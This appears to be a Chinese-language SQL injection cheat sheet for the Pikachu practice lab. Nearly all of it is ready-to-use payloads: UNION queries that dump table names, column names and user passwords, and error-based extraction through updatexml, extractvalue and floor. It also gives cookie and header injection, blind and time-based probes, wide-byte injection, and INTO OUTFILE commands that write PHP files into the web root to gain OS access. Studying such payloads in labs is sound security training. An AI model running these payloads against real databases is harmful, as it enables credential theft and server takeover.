数字型测试:

$id=$_POST[‘id’]

select 字段1,字段2 from 表名 where id = 1 or 1=1;

字符型测试:

$uname=$_GET[‘username’]

select 字段1,字段2 from 表名 where username=’kobe’ or 1=1#’;

搜索型测试:

like ‘%%’

xxxx%’ or 1=1 #

xx型测试:

=(’’)

xx’) or 1=1 #

#获取表名:

select id,email from member where username = ‘kobe’ union select table_schema,table_name from information_schema.tables where table_schema=’pikachu’;

test payload:

kobe’ union select table_schema,table_name from information_schema.tables where table_schema=’pikachu’#

#获取字段名:

select id,email from member where username = ‘kobe’ union select table_name,column_name from information_schema.columns where table_name=’users’;

test payload:

kobe’ union select table_name,column_name from information_schema.columns where table_name=’users’#

#获取内容

select id,email from member where username = ‘kobe’ union select username,password from users;

test payload:

kobe’ union select username,password from users#

#基于报错:updatexml()

kobe’ and updatexml(1,version(),0)#

~

kobe’ and updatexml(1,concat(0x7e,version()),0)#

kobe’ and updatexml(1,concat(0x7e,database()),0)#

#报错只能一次显示一行

kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’pikachu’)),0)#

可以使用limit一次一次进行获取表名:

kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=’pikachu’ limit 0,1)),0)#

获取到表名后,在获取列明,思路是一样的:

kobe’ and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=’users’ limit 0,1)),0)#

获取到列名称后,再来获取数据:

kobe’ and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#

kobe’ and updatexml(1,concat(0x7e,(select password from users where username=’admin’ limit 0,1)),0)#

基于insert/update下的报错:

xiaohong’ or updatexml(1,concat(0x7e,database()),0) or ‘

基于delete下的报错:

1 or updatexml(1,concat(0x7e,database()),0)

基于extractvalue()

kobe’ and extractvalue(0,concat(0x7e,version()))#

基于floor()

kobe’ and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

kobe’ and (select 2 from (select count(*),concat((select password from users where username=’admin’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

基于http header:

Cookie: ant[uname]=admin’ and updatexml(1,concat(0x7e,database()),0)#

firefox’ or updatexml(1,concat(0x7e,database()),0) or ‘

kobe’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>112#

(select table_name from information_schema.tables where table_schema=database() limit 0,1)

基于时间的延迟:

kobe’ and if((substr(database(),1,1))=’a’,sleep(5),null)#

宽字节注入:

1%df’ or 1=1#

获取操作系统权限:

kobe’ union select ““,2 into outfile “/var/www/html/3.php”#

kobe’ union select ““,2 into outfile “/var/www/html/2.php”#

暴力破解表名和列名称:

kobe’ and exists(select * from aa)#

kobe’ and exists(select id from users)#